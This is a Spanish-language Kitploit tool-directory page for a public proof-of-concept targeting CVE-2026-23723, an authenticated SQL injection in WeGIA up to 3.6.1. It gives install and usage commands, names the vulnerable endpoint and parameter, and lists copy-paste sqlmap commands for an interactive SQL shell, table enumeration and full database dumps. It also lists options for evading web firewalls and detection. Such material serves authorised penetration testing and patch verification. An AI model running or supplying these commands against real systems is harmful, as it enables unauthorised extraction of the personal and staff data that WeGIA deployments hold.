Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23723-POC — Este es un script auxiliar ligero en Python diseñado para automatizar la generación de archivos PoC compatibles con sqlmap para la vulnerabilidad de inyección SQL basada en errores autenticada en WeGIA (≤ 3.6.1), identificada como GHSA-xfmp-2hf9-gfjp. | Kitploit
Herramientas/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Este es un script auxiliar ligero en Python diseñado para automatizar la generación de archivos PoC compatibles con sqlmap para la vulnerabilidad de inyección SQL basada en errores autenticada en WeGIA (≤ 3.6.1), identificada como GHSA-xfmp-2hf9-gfjp.

Ver Repositorio
31hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC CVE-2026-23723 - Ayudante de Explotación de Inyección SQL Autenticada en WeGIA

Inyección SQL Basada en Errores Autenticada en WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Aviso Oficial

Autor Original del PoC / Reportante: ViniCastro2001 GHSA Publicado por: nilsonLazarin (mantenedor del proyecto)

Este script ligero en Python automatiza:

  • Inicio de sesión en el sistema WeGIA usando las credenciales proporcionadas
  • Extracción de una cookie de sesión PHP válida
  • Generación de un archivo de solicitud compatible con sqlmap (punto de inyección marcado como id_memorando=1*)
  • Salida de comandos sqlmap listos para ejecutar para enumeración, shell interactivo y volcado de datos

Características

  • Prueba múltiples rutas de inicio de sesión comunes y nombres de campos de formulario para una mejor compatibilidad
  • Genera un archivo de solicitud para sqlmap (.req)
  • Proporciona comandos sqlmap de copiar y pegar para:
    • Shell interactivo tipo MySQL (--sql-shell)
    • Enumeración de bases de datos / tablas
    • Volcado de tablas específicas o volcado completo de la base de datos

Requisitos

  • Python 3.x
  • Biblioteca requests (la mayoría de los entornos de pruebas de penetración ya la tienen)
  • sqlmap instalado y en tu PATH

Instalación

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Uso

root@kitploit:~
# Recomendado: solicitud interactiva de contraseña
python CVE-2026-23723.py --url http://target.com -u admin

# Proporcionar la contraseña directamente
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Archivo de salida personalizado
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

Después de ejecutarse correctamente, el script:

Intentará iniciar sesión Generará wegia_sqlmap.req (o tu nombre de archivo personalizado) Mostrará comandos sqlmap listos para usar

Ejemplo de comandos generados:

root@kitploit:~
# 1. Shell interactivo tipo MySQL (muy recomendado)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Mostrar base de datos actual y todas las bases de datos
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Listar tablas en la base de datos wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Volcar una tabla específica (ejemplo: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Volcar toda la base de datos wegia (¡con cuidado!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Opciones opcionales de sqlmap:

--proxy=http://127.0.0.1:8080 (a través de Burp/ZAP)
--tamper=space2comment,randomcase (evasión básica de WAF)
--delay=1 (ralentizar para evitar la detección)

Si el Inicio de Sesión Automático Falla Inicia sesión manualmente a través del navegador → copia la cabecera Cookie completa → ejecuta sqlmap directamente:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Aviso Legal Este PoC se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas. El uso no autorizado contra cualquier sistema es ilegal y está prohibido. El autor y los colaboradores no asumen ninguna responsabilidad por el mal uso o cualquier daño causado. Referencias

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Descargar herramienta